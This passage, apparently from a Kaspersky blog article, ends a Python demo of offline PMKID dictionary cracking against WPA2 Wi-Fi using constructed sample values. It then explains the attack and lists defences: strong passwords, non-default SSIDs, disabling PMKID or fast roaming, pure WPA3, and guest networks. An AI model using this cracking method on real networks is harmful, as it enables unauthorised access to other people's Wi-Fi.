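SAMPLE_MAC_STA = bytes.fromhex("a0b1c2d3e4f5")  # constructed attacker/client MAC
SAMPLE_PASSPHRASE = "Welcome123"                # constructed weak passphrase
SAMPLE_LINE = to_22000_line(
    derive_pmkid(derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID), SAMPLE_MAC_AP, SAMPLE_MAC_STA),
    SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_SSID)

# Constructed wordlist in the style of a "most common passwords" list.
SAMPLE_WORDLIST = ["password", "12345678", "qwertyuiop", "iloveyou", "Welcome123", "letmein99"]

if __name__ == "__main__":
    print("captured:", SAMPLE_LINE)
    print("cracked: ", crack_pmkid(SAMPLE_LINE, SAMPLE_WORDLIST))
```

The only information the attacker needs is what the router itself sends in the first handshake frame (PMKID, both MAC addresses and the SSID); nothing in the loop depends on a legitimate client ever connecting. The per-guess cost is entirely the 4096 PBKDF2 rounds in derive_pmk, which is why the attack is a dictionary attack rather than an exhaustive search.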

How to protect your wireless network from a PMKID attack

What can you do to prevent a PMKID interception attack on your wireless network? Fortunately, there are several protective measures that aren’t too difficult to implement:

Create a password for your wireless network that is as long and complex as possible. If an attacker captures the PMKID from your Wi-Fi, they still have to crack it afterward, and the more complex the password, the less likely they are to succeed. Therefore, to protect against this attack, create the longest and most unguessable password you can for your wireless network. It also helps to give the network a non-default name: the SSID is used as the salt in the password hash, so a generic name like the router manufacturer's default lets attackers reuse tables precomputed for that name.
Disable PMKID transmission in the router settings. Unfortunately, not all routers allow this, but it's worth checking whether yours has this setting. Look for options named PMKID, PMK caching, 802.11r or fast roaming/fast transition. With a single router there is nothing to roam between, so you lose nothing by turning fast roaming off.
Switch to WPA3. If all your devices support this newer Wi-Fi security standard, it's worth switching to it: WPA3-Personal replaces the password-derived PMK with a key agreed in the SAE handshake, so a captured PMKID no longer reveals anything about the password and can't be cracked offline. One caveat: the common "WPA2/WPA3 transition" (mixed) mode still accepts WPA2-PSK connections, and an attacker will simply ask for one, so the protection only holds once WPA2 is switched off completely.
Set up a guest network. It can be tedious to have to frequently enter a strong password for the main network on new devices, so set up a guest network with a simpler password. By the way, it’s also a good idea to transfer potentially insecure things like IoT devices to the guest network.
Use the "Devices on My Network" feature, which is available in Kaspersky Plus and Kaspersky Premium. It shows a list of the devices on your network and alerts you if a new device connects to it.

For additional protection of transmitted data in case someone still manages to hack your Wi-Fi, use a VPN on all your devices to secure the internet connection — for example, our Kaspersky Secure Connection, which is also included in the Kaspersky Plus and Kaspersky Premium subscriptions.
